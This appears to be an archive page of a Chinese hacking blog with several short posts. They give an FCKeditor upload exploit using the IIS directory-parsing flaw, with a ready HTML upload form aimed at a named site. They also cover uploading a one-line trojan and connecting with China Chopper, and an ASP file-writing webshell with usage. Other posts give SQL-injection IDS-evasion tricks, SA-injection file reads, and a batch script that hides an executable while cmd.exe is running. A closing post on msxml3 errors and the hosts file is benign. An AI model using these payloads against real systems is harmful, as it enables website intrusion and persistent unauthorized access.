分类目录归档:安全文档

批处理:监控进程与操作

发表于
1

原理就是监控cmd.exe,如果发现进程中出现cmd.exe,表明CMD已经启动。此时就删除某某东西或者操作其他东西等。当cmd.exe不再了,则又操作其他东西等。
源代码如下:
路径请随意修改

======================================================================
@echo off :
:star
Rem 10秒钟检查一次
ping 127.1 -n 10 >nul 2>nul
Rem 进程中查找是否有cmd进程
tasklist|findstr /i “cmd.exe”
Rem 如果没有cmd.exe进程继续跳转到star处继续监控,如果有cmd.exe则跳转到del处删除
if errorlevel 1 (goto star) else (goto del)
Rem 删除自启动
:del
del “C:\Program Files\ok1.exe ”
Rem 继续监控cmd.exe进程
:findagain
ping 127.1 -n 20 >nul 2>nul
tasklist|findstr /i “cmd.exe”

Rem 如果cmd.exe不在了,则跳到not处复制启动项回来,如果还在继续跳到findagain继续查找
if errorlevel 1 (goto not) else (goto findagain)
:not
copy /n “C:\Program Files\ok.exe” “C:\Program Files\ok1.exe”
======================================================================

Fckeditor的版本外部提交

发表于
2

首先,你得确定下Fckeditor的版本。

//editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/FCKeditor/editor/filemanager/connectors/test.html

/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

/fckeditor/editor/filemanager/connectors/asp/connector.asp

/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例

1.查看Media目录下的文件:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

红色Media可以更改为File或者image,相应的进入文件或者图片目录下

2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

红色的是对应的Media目录,蓝色的是特殊目录名字

3.构建表单,上传webshell到特殊目录

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>

Upload a new file:<br>

<input type=”file” name=”NewFile” size=”50″><br>

<input id=”btnUpload” type=”submit” value=”Upload”>

</form>

将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。

最后的一些提示

上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。

转载:fckeditor漏洞再次突破影响版本asp,aspx

发表于
回复

经测试,此方法通杀asp、aspx版本,不适用于php。
之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……
今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。
创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了。
以下是误打误撞的方法,不知道黑扩们发了没。
利用过程:
1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建目录;目录名随便填。

2、上传jpg格式的一句话木马。

3、利用完毕,直接访问一句话木马地址即可,菜刀链接。

SA注射点找不到目录,你还可以这样。

发表于
回复

type  c:\windows\system32\inetsrv\MetaBase.xml // 直接读IIS配置文件,你懂得。

select 1 where 1=(select top 1 physical_device_name  from msdb..backupmediafamily order by media_set_id desc) -  // 查询备份是否成功,一般在不知道目录情况下有效果。如替换SU 或者启动项等。

如果值不是你备份的路径,表示备份失败。

BS小马

<%
On Error Resume Next
set gl=server.CreateObJeCt(“Adodb.Stream”)
gl.Open
gl.Type=2
gl.CharSet=”gb2312″
gl.writetext request(“code”)
gl.SaveToFile server.mappath(request(“path”)),2
gl.Close
set gl=nothing
response.redirect request(“path”)
%>
用法:?code=xxx&path=x.asp

 

通过+号拆解字符串绕过

发表于
回复

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,

 
or ”swords” = N” swords”
 
,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
 
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如
 
or ”swords” =‘sw” +” ords” ;EXEC(‘IN” +” SERT INTO ”+” …..” )
 
6、通过LIKE绕过
以前怎么就没想到呢?

 
or”swords” LIKE ”sw”
 
显然可以很轻松的绕过“=”“>”的限制……
 
7、通过IN绕过
与上面的LIKE的思路差不多,

 
or ”swords” IN (”swords”)
 
 
8、通过BETWEEN绕过

 
or ”swords” BETWEEN ”rw” AND ”tw”
 
9、通过>或者<绕过
 
or ”swords” > ”sw”
or ”swords” < ”tw”
or 1<3
……
 
10、运用注释语句绕过
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
 
11、用HEX绕过,一般的IDS都无法检测出来
 
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
 

PS:

以上相关技巧到现在都还是有效果的,部分方法在不同的网站程序中也都是通用的,大家可以灵活运用

网站访问出现 msxml3.dll 错误 ’80072ee7′的一些处理办法

发表于
回复

(1)msxml3.dll错误 ’

The server name or address could not be resolved /inc/vbfun.asp,行 23 个人处理方法是:一般是被 插入代码或木马影响出现.

(2) 错误 ’80072efd’

A connection with the server could not be established

/inc/bfun.asp,行 56

个人处理方法是:一般是无法采集导致出现的问题.

网上的解决————————————————– -

解决方式:

出错信息为:The server name … address could not be resolved

原因:受控域名没有解析或者您所用的dns不稳定造成的。

分析:如果您的主控服务器上无法解析受控网址,就会造成上面的错误

。例如您用的是注册商的dns,也有可能是注册商的dns当了才造

成上面的错误。

解决:您可以在主控服务器上,用IE打开受控网址,看看能不能访问?

如果不能访问,就要检查域名解析是否正常?如果您的域名解析

商的DNS经常性的不稳定,您可以在主控服务器上修改hosts文

件来强行解析:

在主控服务器上,

用记事本打开C:\WINDOWS\system32\drivers\etc\hosts

IP1 受控域名1

IP2 受控域名2

加在最下面的一行.

保存以后,域名就会马上就生效了。

DOS下直接写入:
echo xxx.xxx.xxx.xxx  www.baidu.com >>C:\WINDOWS\system32\drivers\etc\hosts